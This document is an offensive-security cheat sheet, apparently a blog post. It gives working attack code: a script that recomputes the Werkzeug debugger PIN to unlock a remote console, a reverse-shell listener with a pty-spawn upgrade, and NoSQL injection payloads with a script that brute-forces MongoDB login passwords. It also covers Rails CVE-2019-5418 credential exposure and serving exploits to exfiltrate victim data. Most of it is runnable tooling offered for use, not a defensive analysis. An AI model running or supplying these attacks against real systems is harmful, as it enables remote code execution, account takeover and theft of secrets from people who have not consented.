Werkzeug Console PIN Exploit

Force a debug error page in the app to see Werkzeug's “console locked” message: the console is locked and needs to be unlocked by entering the PIN, which Werkzeug prints on the standard output of the shell that runs the server. The vulnerable debug console itself lives at vulnerable-site.com/console, but it is locked by that secret PIN. Because the PIN is derived deterministically from a handful of values on the host, you can reverse the algorithm that generates it. Inspect Werkzeug's debug __init__.
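The hashing that get_pin_and_cookie_name() in werkzeug/debug/__init__.py performs, recomputed off-line. This is an added example, not code from the original post: the four "probably public" bits (username, module name, app class name, path of flask/app.py) and the two "private" bits (MAC address as a decimal integer, machine id) are constructed sample values here; on a real target the public ones come from the traceback page and the private ones have to be read from the host.

```python
"""Recompute the Werkzeug debugger PIN (and the __wzd cookie name) from the
values that get_pin_and_cookie_name() in werkzeug/debug/__init__.py hashes.

Added example; not code from the original post. The sample values below are
constructed: on a real target the four public bits come from the traceback
page and the two private bits have to be read from the host."""
import hashlib
from typing import Iterable, Tuple, Union

Bit = Union[str, bytes, None]


def format_pin(num: str) -> str:
    """Werkzeug splits the digits into equal groups of 5, 4 or 3, whichever fits."""
    for group_size in (5, 4, 3):
        if len(num) % group_size == 0:
            return "-".join(num[x:x + group_size].rjust(group_size, "0")
                            for x in range(0, len(num), group_size))
    return num


def mac_to_node(mac: str) -> str:
    """uuid.getnode() is the interface MAC as a decimal integer, hashed as a string."""
    return str(int(mac.replace(":", ""), 16))


def werkzeug_pin(probably_public_bits: Iterable[Bit], private_bits: Iterable[Bit],
                 algo: str = "sha1") -> Tuple[str, str]:
    """Mirror of the hashing in get_pin_and_cookie_name(). Current Werkzeug
    uses SHA-1; old releases used MD5, so pass algo="md5" if the target's
    werkzeug/debug/__init__.py shows hashlib.md5()."""
    h = hashlib.new(algo)
    for bit in list(probably_public_bits) + list(private_bits):
        if not bit:
            continue
        h.update(bit.encode("utf-8") if isinstance(bit, str) else bit)
    h.update(b"cookiesalt")
    cookie_name = f"__wzd{h.hexdigest()[:20]}"
    h.update(b"pinsalt")                        # extra salt only for the PIN
    num = f"{int(h.hexdigest(), 16):09d}"[:9]   # first nine decimal digits
    return format_pin(num), cookie_name


# Constructed sample values (assumptions, not from the original post).
PUBLIC_BITS = [
    "www-data",                                              # getpass.getuser() on the server
    "flask.app",                                             # app.__module__
    "Flask",                                                 # type(app).__name__
    "/usr/local/lib/python3.8/site-packages/flask/app.py",   # flask.app.__file__, shown in the traceback
]
PRIVATE_BITS = [
    mac_to_node("00:0c:29:ab:cd:ef"),     # /sys/class/net/eth0/address, as decimal
    "3f4c8d2e1b6a49e7b5c0f1d2a3b4c5d6",   # /etc/machine-id (newer Werkzeug appends a cgroup suffix)
]

if __name__ == "__main__":
    pin, cookie = werkzeug_pin(PUBLIC_BITS, PRIVATE_BITS)
    print(f"PIN: {pin}  cookie: {cookie}")
```

Every bit has to match byte for byte, including the exact site-packages path and the MAC of the interface uuid.getnode() picks, so compare the cookie name the script produces with the __wzd cookie the debugger sets before spending attempts on the PIN.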

Upgrade Default Reverse Shell to Fully Interactive Shell

After catching a reverse shell with a netcat listener (e.g. nc -lvp 6969), the default “dumb shell” is non-interactive: it cannot handle special keyboard input such as tab completion, backspace, or arrow keys. To upgrade the dumb shell to a fully interactive one, first run this Python one-liner in it to get a partially interactive shell: python -c 'import pty;pty.spawn("/bin/bash");' Then press Ctrl-Z in your terminal to background netcat. Now, with the shell backgrounded, change the terminal line settings to raw and tell it to pass keyboard shortcuts through:
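The same upgrade done by the listener itself, as an added example that is not part of the original post: instead of netcat plus the usual stty raw -echo; fg step, this script puts the local terminal into raw mode and relays bytes between it and the remote shell, so tab, arrow keys, Ctrl-C and Ctrl-Z reach the victim's pty instead of being interpreted locally. It assumes the victim has python3 and /bin/bash, and the port is an assumption.

```python
"""Attacker-side listener that gives a fully interactive shell directly:
it puts the local terminal in raw mode (what `stty raw -echo` does) and
relays bytes between that terminal and the remote shell.

Added example; the victim is assumed to have python3 and /bin/bash."""
import os
import select
import shutil
import socket
import sys
import termios
import tty

# Sent to the dumb shell first: the pty spawn from the post, then a
# `stty` that sizes the victim's pty like our terminal so editors and
# pagers render correctly.
SPAWN_PTY = "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'\n"


def bridge(remote: socket.socket, stdin_fd: int, stdout_fd: int) -> int:
    """Relay bytes until the remote closes. Returns bytes received from remote."""
    received = 0
    watch = [remote, stdin_fd]
    while True:
        readable, _, _ = select.select(watch, [], [])
        if remote in readable:
            data = remote.recv(4096)
            if not data:
                return received
            received += len(data)
            os.write(stdout_fd, data)
        if stdin_fd in readable:
            data = os.read(stdin_fd, 4096)
            if data:
                remote.sendall(data)           # raw keystrokes, including ^C/^Z/tab
            else:                              # local EOF: stop reading, drain remote
                watch.remove(stdin_fd)
                remote.shutdown(socket.SHUT_WR)


def serve(port: int) -> int:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        print(f"[*] listening on 0.0.0.0:{port}", file=sys.stderr)
        conn, peer = srv.accept()
    with conn:
        print(f"[*] shell from {peer[0]}:{peer[1]}", file=sys.stderr)
        cols, rows = shutil.get_terminal_size()
        conn.sendall(SPAWN_PTY.encode())
        conn.sendall(f"stty rows {rows} cols {cols}; export TERM=xterm\n".encode())
        fd = sys.stdin.fileno()
        saved = termios.tcgetattr(fd)
        tty.setraw(fd)                         # the `stty raw -echo` equivalent
        try:
            return bridge(conn, fd, sys.stdout.fileno())
        finally:
            termios.tcsetattr(fd, termios.TCSADRAIN, saved)   # restore on exit


if __name__ == "__main__":
    serve(int(sys.argv[1]) if len(sys.argv) > 1 else 6969)
```

Because the local tty is raw, Ctrl-C is delivered to the remote pty as byte 0x03 and interrupts the victim-side process rather than killing the listener; the original terminal settings are restored when the remote side closes.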

Bruteforce MongoDB Credentials with Regex Match Payload

If a login form is vulnerable to NoSQL injection, try bypassing authentication with a payload such as: username[$ne]=foo&password[$ne]=foo. Explicit login credentials may still be required for deeper system access, however. Where this injection exists, a regex-matching payload can also enumerate the full plaintext password, one character at a time. Here is a Go script to bruteforce admin credentials on a login form that uses MongoDB as a backend. In this example the script assumes the application returns a unique HTTP response code of 302 when the password regex matches.
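The enumeration loop described above, as an added example written in Python rather than the post's Go script and not taken from it. It assumes the form parser turns password[$regex] into a MongoDB operator, that a matching regex yields a 302 while a non-match does not, and a hypothetical login URL and username; the oracle is injectable so the loop can be checked against a fake backend.

```python
"""Recover a MongoDB-backed login's password one character at a time
through a NoSQL operator injection in the password field.

Added example in Python (the original post uses a Go script); the URL,
field names and the 302-on-match behaviour are assumptions."""
import re
import string
from typing import Callable, Optional

# Candidate characters; each position costs up to len(CHARSET) requests.
CHARSET = string.ascii_letters + string.digits + string.punctuation

Oracle = Callable[[str], bool]   # regex pattern -> did the login succeed?


def http_oracle(url: str, username: str, success_status: int = 302) -> Oracle:
    """Real oracle: POST username=<user>&password[$regex]=<pattern>.
    A body parser that turns field[$op] into {"$op": ...} hands the operator
    to MongoDB, so the login succeeds exactly when the regex matches the
    stored password. Uses `requests` (third-party, assumed installed)."""
    import requests

    def oracle(pattern: str) -> bool:
        resp = requests.post(url, data={"username": username, "password[$regex]": pattern},
                             allow_redirects=False, timeout=10)
        return resp.status_code == success_status
    return oracle


def bruteforce_password(oracle: Oracle, max_len: int = 64) -> Optional[str]:
    """Extend a known prefix until ^prefix$ matches the whole password.
    re.escape keeps characters like '.', '$' and '*' literal, so a password
    containing them is not mistaken for a match early. Returns None if a
    character outside CHARSET is hit or max_len is exceeded."""
    known = ""
    while len(known) <= max_len:
        if oracle(f"^{re.escape(known)}$"):   # fully anchored: whole password recovered
            return known
        for ch in CHARSET:
            if oracle(f"^{re.escape(known + ch)}"):
                known += ch
                break
        else:
            return None                       # no candidate extends the prefix
    return None


if __name__ == "__main__":
    import sys
    # usage: python3 nosql_regex.py https://target.example/login admin
    print(bruteforce_password(http_oracle(sys.argv[1], sys.argv[2])))
```

With the default charset a 10-character password costs at most about a thousand requests, so look for rate limiting or account lockout before running it against a production login.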

Expose & Decrypt Ruby on Rails credentials.yml.enc

Unpatched versions of Ruby on Rails are vulnerable to a critical information disclosure via the “Accept” header (CVE-2019-5418): directory traversal in that header can leak the Rails app's secret credentials. Expose the master key and encrypted credentials. First find a path in the Rails app that uses the render file method; typically a 404 page implements this to render the view. Read more about the root cause of this vulnerability from chybeta. Using Burp Suite Repeater or a curl request, test the vulnerability by setting the header value to Accept: .

Serving PoC Exploits with an HTTP Attack Server

Quickly serve your exploit files with the Node.js-based http-server by http-party. After testing several different HTTP server scripts, this one fits my use case best: it is easy to deploy (no installation), actively maintained on GitHub, and provides live verbose logging of incoming requests. The logging is especially useful when you need to exfiltrate data from the victim. How to deploy: on your machine/VPS, cd into the directory containing the file(s) you want to serve.